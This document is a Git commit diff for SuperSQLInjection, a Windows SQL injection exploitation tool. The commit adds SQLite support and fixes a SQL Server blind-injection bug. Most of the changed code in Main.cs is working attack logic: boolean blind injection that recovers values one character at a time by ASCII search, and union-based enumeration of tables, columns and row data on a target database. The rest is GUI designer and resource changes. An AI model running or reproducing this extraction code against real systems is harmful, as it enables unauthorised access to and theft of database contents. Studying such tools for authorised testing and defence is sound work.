shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update20190104

Browse Source 
20190104 V1.0 正式版---
修复SQLServer盲注,由于表名替换错误,导致列获取不成功的问题。
优化配置文件。
新增支持SQLite数据库的注入,支持盲注和Union方式,暂不支持显错模式,SQLite支持3以上版本,如果是3以下版本,由于不支持部分函数,可能无法获取数据。
This commit is contained in:
shack2
2019-01-04 17:53:34 +08:00
parent 623e41317e
commit aaae08f3e1
10 changed files with 656 additions and 182 deletions
Download Patch File Download Diff File Expand all files Collapse all files

63
SuperSQLInjection/Main.Designer.cs generated
View File

@@ -105,6 +105,7 @@
this.tab_vers = new System.Windows.Forms.TabPage();
this.data_lvw_ver = new System.Windows.Forms.ListView();
this.data_lvw_ver_verName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.data_lvw_ver_val = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.data_cms_vers = new System.Windows.Forms.ContextMenuStrip(this.components);
this.data_cms_tsmi_getVariable = new System.Windows.Forms.ToolStripMenuItem();
this.data_cms_tsmi_stopGetVariable = new System.Windows.Forms.ToolStripMenuItem();
@@ -171,9 +172,11 @@
this.txt_sencond_request = new System.Windows.Forms.TextBox();
this.groupBox3 = new System.Windows.Forms.GroupBox();
this.groupBox16 = new System.Windows.Forms.GroupBox();
this.label34 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.txt_inject_showIndex = new System.Windows.Forms.TextBox();
this.label8 = new System.Windows.Forms.Label();
this.txt_inject_unionTemplate = new System.Windows.Forms.TextBox();
this.txt_inject_unionColumnsCount = new System.Windows.Forms.TextBox();
this.btn_inject_sendData = new System.Windows.Forms.Button();
this.btn_inject_clearRequest = new System.Windows.Forms.Button();
@@ -321,9 +324,6 @@
this.lbl_packsCount = new System.Windows.Forms.ToolStripStatusLabel();
this.timer_status = new System.Windows.Forms.Timer(this.components);
this.timer_scanInjection = new System.Windows.Forms.Timer(this.components);
this.data_lvw_ver_val = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.label34 = new System.Windows.Forms.Label();
this.txt_inject_unionTemplate = new System.Windows.Forms.TextBox();
this.gb_basic.SuspendLayout();
this.menuStrip_main.SuspendLayout();
this.gb_logo.SuspendLayout();
@@ -572,7 +572,8 @@
"SQLServer",
"Oracle",
"PostgreSQL",
"DB2"});
"DB2",
"SQLite"});
this.cbox_basic_dbType.Location = new System.Drawing.Point(489, 50);
this.cbox_basic_dbType.Name = "cbox_basic_dbType";
this.cbox_basic_dbType.Size = new System.Drawing.Size(87, 20);
@@ -1182,6 +1183,11 @@
this.data_lvw_ver_verName.Text = "变量名";
this.data_lvw_ver_verName.Width = 250;
//
// data_lvw_ver_val
//
this.data_lvw_ver_val.Text = "变量值";
this.data_lvw_ver_val.Width = 500;
//
// data_cms_vers
//
this.data_cms_vers.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -1509,7 +1515,7 @@
this.groupBox4.Controls.Add(this.data_dbs_lvw_data);
this.groupBox4.Location = new System.Drawing.Point(3, 6);
this.groupBox4.Name = "groupBox4";
this.groupBox4.Size = new System.Drawing.Size(577, 379);
this.groupBox4.Size = new System.Drawing.Size(578, 379);
this.groupBox4.TabIndex = 1;
this.groupBox4.TabStop = false;
this.groupBox4.Text = "获取数据";
@@ -1523,7 +1529,7 @@
this.data_dbs_lvw_data.GridLines = true;
this.data_dbs_lvw_data.Location = new System.Drawing.Point(3, 17);
this.data_dbs_lvw_data.Name = "data_dbs_lvw_data";
this.data_dbs_lvw_data.Size = new System.Drawing.Size(571, 359);
this.data_dbs_lvw_data.Size = new System.Drawing.Size(572, 359);
this.data_dbs_lvw_data.TabIndex = 1;
this.data_dbs_lvw_data.UseCompatibleStateImageBehavior = false;
this.data_dbs_lvw_data.View = System.Windows.Forms.View.Details;
@@ -1879,6 +1885,15 @@
this.groupBox16.TabStop = false;
this.groupBox16.Text = "Union注入取数据配置";
//
// label34
//
this.label34.AutoSize = true;
this.label34.Location = new System.Drawing.Point(10, 61);
this.label34.Name = "label34";
this.label34.Size = new System.Drawing.Size(65, 12);
this.label34.TabIndex = 1;
this.label34.Text = "填充模板:";
//
// label4
//
this.label4.AutoSize = true;
@@ -1907,6 +1922,17 @@
this.label8.TabIndex = 8;
this.label8.Text = "显示列:";
//
// txt_inject_unionTemplate
//
this.txt_inject_unionTemplate.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.txt_inject_unionTemplate.Location = new System.Drawing.Point(78, 58);
this.txt_inject_unionTemplate.MaxLength = 1000;
this.txt_inject_unionTemplate.Name = "txt_inject_unionTemplate";
this.txt_inject_unionTemplate.Size = new System.Drawing.Size(158, 21);
this.txt_inject_unionTemplate.TabIndex = 7;
this.txt_inject_unionTemplate.TextChanged += new System.EventHandler(this.txt_inject_unionTemplate_TextChanged);
//
// txt_inject_unionColumnsCount
//
this.txt_inject_unionColumnsCount.Location = new System.Drawing.Point(70, 22);
@@ -3376,31 +3402,6 @@
this.timer_scanInjection.Interval = 1000;
this.timer_scanInjection.Tick += new System.EventHandler(this.timer_scanInjection_Tick);
//
// data_lvw_ver_val
//
this.data_lvw_ver_val.Text = "变量值";
this.data_lvw_ver_val.Width = 500;
//
// label34
//
this.label34.AutoSize = true;
this.label34.Location = new System.Drawing.Point(10, 61);
this.label34.Name = "label34";
this.label34.Size = new System.Drawing.Size(65, 12);
this.label34.TabIndex = 1;
this.label34.Text = "填充模板:";
//
// txt_inject_unionTemplate
//
this.txt_inject_unionTemplate.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.txt_inject_unionTemplate.Location = new System.Drawing.Point(78, 58);
this.txt_inject_unionTemplate.MaxLength = 1000;
this.txt_inject_unionTemplate.Name = "txt_inject_unionTemplate";
this.txt_inject_unionTemplate.Size = new System.Drawing.Size(158, 21);
this.txt_inject_unionTemplate.TabIndex = 7;
this.txt_inject_unionTemplate.TextChanged += new System.EventHandler(this.txt_inject_unionTemplate_TextChanged);
//
// Main
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);

435
SuperSQLInjection/Main.cs
View File

@@ -230,7 +230,7 @@ namespace SuperSQLInjection
return sid;
}
public static int version = 20190102;
public static int version = 20190104;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -609,7 +609,6 @@ namespace SuperSQLInjection
}
public void getVariablesByUnionByDB2(Object v)
{
String[] sv = v.ToString().Split(':');
String pay_load = DB2.getUnionDataValue(config.unionFillTemplate, sv[1], "", "", "");
String result = getOneDataByUnionOrError(pay_load);
@@ -617,6 +616,15 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
public void getVariablesByUnionBySQLite(Object v)
{
String[] sv = v.ToString().Split(':');
String pay_load = SQLite.getUnionDataValue(config.columnsCount,config.showColumn, config.unionFill,sv[1]);
String result = getOneDataByUnionOrError(pay_load);
this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
Interlocked.Increment(ref this.currentDataCount);
}
public void getVariablesByErrorByMySQL(Object v)
{
String[] sv = v.ToString().Split(':');
@@ -708,6 +716,9 @@ namespace SuperSQLInjection
case DBType.DB2:
stp.QueueWorkItem<String>(getVariablesByUnionByDB2, v);
break;
case DBType.SQLite:
stp.QueueWorkItem<String>(getVariablesByUnionBySQLite, v);
break;
}
}
stp.WaitForIdle();
@@ -812,6 +823,10 @@ namespace SuperSQLInjection
case DBType.DB2:
stp.QueueWorkItem<String>(getVariableByBoolByDB2, v);
break;
case DBType.SQLite:
//获取对应环境变量值
stp.QueueWorkItem<String>(getVariableByBoolBySQLite, v);
break;
}
}
stp.WaitForIdle();
@@ -1132,7 +1147,7 @@ namespace SuperSQLInjection
}
/// <summary>
/// 获取环境变量oracle bool
/// 获取环境变量DB2 bool
/// </summary>
/// <param name="vers"></param>
public void getVariableByBoolByDB2(Object vers)
@@ -1166,6 +1181,41 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取环境变量DB2 bool
/// </summary>
/// <param name="vers"></param>
public void getVariableByBoolBySQLite(Object vers)
{
try
{
String[] vs = vers.ToString().Split(':');
//判断变量长度
int len = getValueByStepUp(SQLite.bool_length.Replace("{data}", vs[1]), 0, 10);
this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info);
String va_payload = SQLite.bool_value.Replace("{data}", vs[1]);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
String dp = va_payload.Replace("{index}", i.ToString());
int ascii = getValue(dp, 32, 126);
value += (char)ascii;
this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
}
this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
delegate void addItemToListViewDelegate(ListViewItem item);
public void addItemToListView(ListViewItem item)
@@ -1886,6 +1936,43 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// bool方式获取表
/// </summary>
/// <param name="osn"></param>
public void getTableNameValueByBoolBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
int selectIndex = sn.tn.Index;
//判断当前表长度
String data_payload = SQLite.table_value.Replace("{index}", sn.limit + "");
int len = getValue(SQLite.bool_length.Replace("{data}", data_payload), 1, 50);
//判断当前数据库对应的ascii码
String va_payload = SQLite.bool_value.Replace("{data}", data_payload);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String tmp_va_payload = va_payload.Replace("{index}", i + "");
int ascii = getValue(tmp_va_payload, 0, 128);
value += ((char)ascii).ToString();
}
this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + value, LogLevel.info);
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table");
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentTableCount);
}
public void getTableNameValueByBoolBySQLServerSleep(Object osn)
@@ -2024,6 +2111,22 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// 获取表名多线程调用sqlite
/// </summary>
/// <param name="osn"></param>
public void getTableNameValueByUnionBySQLite(Object osn)
{
SelectNode sn = (SelectNode)osn;
String tables_value_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.table_value.Replace("{index}", sn.limit.ToString()));
String result = getOneDataByUnionOrError(tables_value_payload);
this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info);
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// 获取表名多线程调用Oracle
/// </summary>
@@ -2231,7 +2334,6 @@ namespace SuperSQLInjection
}
}
return len;
}
/// <summary>
@@ -3016,6 +3118,20 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
//获取当前数据库长度
this.tableCount = getValueByStepUp(SQLite.bool_tables_count, 0, 50);
this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbname + "发现" + this.tableCount + "个表!", LogLevel.info);
for (int i = 0; i < this.tableCount; i++)
{
SelectNode sn = new SelectNode();
sn.tn = tn;
sn.limit = i;
stp.QueueWorkItem<SelectNode>(getTableNameValueByBoolBySQLite, sn);
}
stp.WaitForIdle();
break;
}
@@ -3130,6 +3246,23 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
//获取当前数据库表数量
tables_count_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.tables_count);
result = getOneDataByUnionOrError(tables_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info);
this.tableCount = Tools.convertToInt(result);
for (int i = 0; i < this.tableCount; i++)
{
SelectNode sn = new SelectNode();
sn.tn = tn;
sn.limit = i;
sn.dbname = dbName;
stp.QueueWorkItem<SelectNode>(getTableNameValueByUnionBySQLite, sn);
}
stp.WaitForIdle();
break;
}
}
@@ -3255,10 +3388,15 @@ namespace SuperSQLInjection
{
//获取环境变量
this.data_tvw_dbs.Nodes.Clear();
if (DBType.Access.ToString().Equals(this.cbox_basic_dbType.Text))
//没有库的数据库
if (DBType.Access.Equals(config.dbType))
{
addDBToTreeList(DBType.Access.ToString());
}
else if (DBType.SQLite.Equals(config.dbType))
{
addDBToTreeList(DBType.SQLite.ToString());
}
//检查注入配置
if (checkConfig())
{
@@ -3379,7 +3517,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3428,7 +3566,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3442,7 +3580,7 @@ namespace SuperSQLInjection
try
{
SelectNode sn = (SelectNode)osn;
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.columnName, "UTF-8")).Replace("{dbname}", sn.dbname);
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.tableName, "UTF-8")).Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLServer.bool_length.Replace("{data}", data_payload), 0, 10);
String value = "";
//获取值
@@ -3474,7 +3612,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3488,7 +3626,7 @@ namespace SuperSQLInjection
try
{
SelectNode sn = (SelectNode)osn;
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.columnName, "UTF-8")).Replace("{dbname}", sn.dbname);
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.tableName, "UTF-8")).Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLServer.getBoolDataBySleep(SQLServer.bool_length.Replace("{data}", data_payload), config.maxTime), 0, 10);
String value = "";
//获取值
@@ -3531,7 +3669,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3568,7 +3706,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3604,7 +3742,47 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列明称,bool方式
/// </summary>
/// <param name="osn">表的节点</param>
public void getColumnNameByBoolBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
//判断当前长度
String data_payload = SQLite.column_value.Replace("'{table}'", Tools.strToChar(sn.tableName,"UTF-8","||")).Replace("{index}", sn.limit + "").Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLite.bool_length.Replace("{data}", data_payload), 1, 50);
//判断当前数据库对应的ascii码
String va_payload = SQLite.bool_value.Replace("{data}", data_payload);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String tmp_va_payload = va_payload.Replace("{index}", i + "");
int ascii = getValue(tmp_va_payload, 0, 128);
value += ((char)ascii).ToString();
}
List<String> columns = Tools.GetSQLiteColumns(value);
this.Invoke(new showLogDelegate(log), "表" + sn.tableName + "发现列:" + String.Join(",", columns), LogLevel.info);
foreach (String column in columns) {
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, column, "column");
}
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3628,12 +3806,12 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列名union MySQL
/// 获取列名union SQLServer
/// </summary>
/// <param name="osn"></param>
public void getColumnNameByUnionBySQLServer(Object osn)
@@ -3650,7 +3828,33 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列名union SQLServer
/// </summary>
/// <param name="osn"></param>
public void getColumnNameByUnionBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
String column_Name_data = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill,SQLite.column_value.Replace("'{table}'",Tools.strToChar(sn.tableName,"UTF-8","||")));
String result = getOneDataByUnionOrError(column_Name_data);
//SQLite获取的列需要进行处理
List<String> columns = Tools.GetSQLiteColumns(result);
this.Invoke(new showLogDelegate(log), "发现列:" + String.Join(",",columns), LogLevel.info);
foreach (String column in columns) {
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, column, "column");
}
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3738,7 +3942,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3754,7 +3958,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3770,7 +3974,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3786,7 +3990,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3918,6 +4122,13 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
SelectNode csn = new SelectNode();
csn.tn = ctn;
csn.tableName = tableName;
stp.QueueWorkItem<SelectNode>(getColumnNameByBoolBySQLite, csn);
stp.WaitForIdle();
break;
}
}
@@ -4039,6 +4250,12 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
SelectNode csn = new SelectNode();
csn.tn = ctn;
csn.tableName = tableName;
stp.QueueWorkItem<SelectNode>(getColumnNameByUnionBySQLite, csn);
break;
}
}
@@ -4454,6 +4671,69 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据
/// </summary>
/// <param name="pams">列名集合List及limit等参数</param>
public void getDataValueByBoolBySQLite(Object opam)
{
try
{
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = null;
foreach (String columnName in gp.columns)
{
//取每一列的值
String data_payload = SQLite.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
String payload_len = SQLite.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
int len = getValueByStepUp(payload_len, 0, 50);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String unicode_data_payload = SQLite.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
//根据unicode值得长度确定范围在判断提高效率
for (int j = 3; j <= 7; j++)
{
Boolean isLarge = checkLen(SQLite.check_li_value.Replace("{data}", unicode_data_payload), j);
if (isLarge)
{
int end = (int)Math.Pow(10, j - 1) - 1;
int unicode = getValue(SQLite.bool_noUnicode_value.Replace("{data}", unicode_data_payload), 0, end);
value += Tools.unHexByUnicode(unicode, config.db_encoding);
break;
}
}
}
if (lvi == null)
{
lvi = new ListViewItem(value);
}
else
{
lvi.SubItems.Add(value);
}
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行,"+columnName+"的值:"+ value, LogLevel.info);
}
this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit+1) + "行的值!", LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据
@@ -4803,6 +5083,29 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据union方式
/// </summary>
/// <param name="pams">列名集合List及limit等参数</param>
public void getDataValueByUnionBySQLite(Object opam)
{
try
{
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = new ListViewItem();
String result = getOneDataByUnionOrError(SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.limit.ToString()));
this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit+1) + "行的值!", LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据union方式
/// </summary>
@@ -5236,6 +5539,32 @@ namespace SuperSQLInjection
MessageBox.Show("没有这么多行数据,请改小点!");
}
break;
case DBType.SQLite:
isMax = findKeyInBody(SQLite.bool_datas_count.Replace("{table}", this.curren_table), start + dataCount);
if (isMax)
{
//下标从1开始
for (int i = 0; i < dataCount; i++)
{
GetDataPam gd = new GetDataPam();
gd.columns = columns;
gd.dbname = this.curren_db;
gd.table = this.curren_table;
gd.limit = start + i;
gd.isMuStr = config.isMuStr;
stp.WaitFor(100);
stp.QueueWorkItem<GetDataPam>(getDataValueByBoolBySQLite, gd);
}
stp.WaitForIdle();
}
else
{
MessageBox.Show("没有这么多行数据,请改小点!");
}
break;
}
@@ -5388,7 +5717,7 @@ namespace SuperSQLInjection
case DBType.Access:
datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, Access.data_count.Replace("{table}", this.curren_table)).Replace("{table}", this.curren_table);
datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, Access.data_count.Replace("{table}", this.curren_table));
result = getOneDataByUnionOrError(datas_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success);
@@ -5557,6 +5886,35 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
datas_count_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.data_count.Replace("{table}", this.curren_table));
result = getOneDataByUnionOrError(datas_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success);
this.dataCount = Tools.convertToInt(result);
if (this.dataCount < (dataCount + start))
{
this.Invoke(new showLogDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!", LogLevel.waring);
this.data_dbs_txt_count.Text = this.dataCount.ToString();
break;
}
//下标从1开始
for (int i = 0; i < dataCount; i++)
{
GetDataPam gd = new GetDataPam();
gd.columns = columns;
gd.dbname = this.curren_db;
gd.table = this.curren_table;
gd.limit = start + i;
gd.isMuStr = config.isMuStr;
stp.WaitFor(100);
stp.QueueWorkItem<GetDataPam>(getDataValueByUnionBySQLite, gd);
}
stp.WaitForIdle();
break;
}
}
@@ -6246,7 +6604,6 @@ namespace SuperSQLInjection
}
if (list_columns.Count > 0)
{
this.data_dbs_lvw_data.Items.Clear();
}
this.currentDataCount = 0;
@@ -6353,12 +6710,10 @@ namespace SuperSQLInjection
{
this.file_cbox_readWrite.Enabled = true;
this.file_cbox_readWrite.Items.Add("请选择读写文件方式");
this.file_cbox_readWrite.Items.AddRange(list.ToArray());
this.file_cbox_readWrite.Items.AddRange(list.ToArray());
}
else {
this.file_cbox_readWrite.Items.Add("此数据库类型暂不支持文件读写!");
this.file_cbox_readWrite.Items.Add("此数据库类型暂不支持文件读写!");
}
}
catch (Exception ee) {
@@ -6389,24 +6744,16 @@ namespace SuperSQLInjection
public void loadVersToListView(DBType dbtype) {
List<String> vers = null;
switch (config.dbType)
try
{
case DBType.MySQL:
vers = MySQL.vers;
break;
case DBType.SQLServer:
vers = SQLServer.vers;
break;
case DBType.Oracle:
vers = Oracle.vers;
break;
case DBType.PostgreSQL:
vers = PostgreSQL.vers;
break;
case DBType.DB2:
vers = DB2.vers;
break;
Type type = Type.GetType("SuperSQLInjection.payload." + config.dbType.ToString());
vers = (List<String>)type.GetField("vers").GetValue(null);
}
catch (Exception e)
{
Tools.SysLog("loadVersToListView异常" + e.Message);
}
this.data_lvw_ver.Items.Clear();
if (vers!=null&& vers.Count>0)
{
@@ -7332,8 +7679,6 @@ namespace SuperSQLInjection
{
try
{
//取值payload替换对应下标值
//select UNICODE(substring(@@version,{index},1))
//取值payload替换对应下标值
String unicode_data_payload = SQLServer.unicode_value.Replace("{index}", index + "").Replace("{data}", SQLServer.file_content);
//取unicode转换后的长度
@@ -8903,7 +9248,7 @@ namespace SuperSQLInjection
private void ToolStripMenuItem_Click(object sender, EventArgs e)
{
MessageBox.Show("V1.1正式版----" + version);
MessageBox.Show("V1.0正式版----" + version);
}
private void data_dbs_tsmi_saveDTCStruct_Click(object sender, EventArgs e)

204
SuperSQLInjection/Main.resx
View File

@@ -126,110 +126,9 @@
<metadata name="data_cms_vers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>477, 17</value>
</metadata>
<metadata name="myicon_list.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>747, 17</value>
</metadata>
<data name="myicon_list.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAB6
FAAAAk1TRnQBSQFMAgEBCwIAAQgBAAEIARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
AUADAAEwAwABAQEAAQgGAAEMGAABgAIAAYADAAKAAQABgAMAAYABAAGAAQACgAIAA8ABAAHAAdwBwAEA
AfABygGmAQABMwUAATMBAAEzAQABMwEAAjMCAAMWAQADHAEAAyIBAAMpAQADVQEAA00BAANCAQADOQEA
AYABfAH/AQACUAH/AQABkwEAAdYBAAH/AewBzAEAAcYB1gHvAQAB1gLnAQABkAGpAa0CAAH/ATMDAAFm
AwABmQMAAcwCAAEzAwACMwIAATMBZgIAATMBmQIAATMBzAIAATMB/wIAAWYDAAFmATMCAAJmAgABZgGZ
AgABZgHMAgABZgH/AgABmQMAAZkBMwIAAZkBZgIAApkCAAGZAcwCAAGZAf8CAAHMAwABzAEzAgABzAFm
AgABzAGZAgACzAIAAcwB/wIAAf8BZgIAAf8BmQIAAf8BzAEAATMB/wIAAf8BAAEzAQABMwEAAWYBAAEz
AQABmQEAATMBAAHMAQABMwEAAf8BAAH/ATMCAAMzAQACMwFmAQACMwGZAQACMwHMAQACMwH/AQABMwFm
